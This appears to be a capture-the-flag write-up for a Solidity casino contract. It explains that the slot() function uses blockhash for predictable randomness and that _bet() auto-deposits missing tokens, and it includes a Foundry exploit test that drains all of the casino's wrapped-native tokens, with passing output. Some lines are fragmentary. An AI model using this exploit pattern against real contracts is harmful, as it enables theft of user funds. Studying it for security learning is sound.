- Scope
- Casino.sol
- WNative.sol
- Tools
has poor randomness vulnerability and the result can be calculated_bet()
deposits the token for you if you do not have enough tokens
-1 function slot() public view returns (uint256) {
unchecked {
uint256 answer = uint256(blockhash(block.number - 1)) % 1000;
uint256[3] memory slots = [(answer / 100) % 10, (answer / 10) % 10, answer % 10];
if (slots[0] == slots[1] && slots[1] == slots[2]) {
if (slots[0] == 7) {
return 100;
} else {
return 10;
} else if (slots[0] == slots[1] || slots[1] == slots[2] || slots[0] == slots[2]) {
return 3;
} else {
return 0;
function _bet(address token, uint256 amount) internal {
require(isAllowed(token), "Token not allowed");
CasinoToken cToken = CasinoToken(token);
try cToken.bet(msg.sender, amount) {}
catch {
cToken = CasinoToken(_tokenMap[token]);
-2 deposit(token, amount);
cToken.bet(msg.sender, amount);
- Manually tested and block.number 4 returns slot of multiplier 3
- Call
with an amount (uint256(1000e18) / 3 + 1) that will win us 1000e18 wNative tokens, even though we don't have enough tokens deposited, the casino will help us to deposit for the bet - Call
and drain the casino's wNative tokens
function test_Exploit() public {
// 1. Manually tested and block.number 4 returns slot of multiplier 3
// 2. Call play() with an amount (uint256(1000e18) / 3 + 1) that will win us 1000e18 wNative tokens
// 3. Call withdraw() and drain the casino's wNative tokens
WrappedNative wToken = base.wNative();
uint256 slot = casino.slot();
console.log("slot: ", slot);
console.log("blockNumber: ", block.number);
console.log("my beforeWNative: ", wToken.balanceOf(address(this)) / 1e18);
console.log("casino beforeWNative: ", wToken.balanceOf(address(casino)) / 1e18);
require(slot > 0, "Slot == 0");
casino.play(wNative, uint256(1000e18) / 3 + 1); // +1 is because 333e18 * 3(slot) = 999e18 wNative tokens only. Hence we need to +1 so we are able to withdraw and burn 1000e18
casino.withdraw(wNative, 1000e18);
console.log("my afterWNative: ", wToken.balanceOf(address(this)) / 1e18);
console.log("casino afterWNative: ", wToken.balanceOf(address(casino)) / 1e18);
[PASS] test_Exploit() (gas: 8937393460516843958)
blockNumber: 4
slot: 3
my beforeWNative: 0
casino beforeWNative: 1000
my afterWNative: 1000
casino afterWNative: 0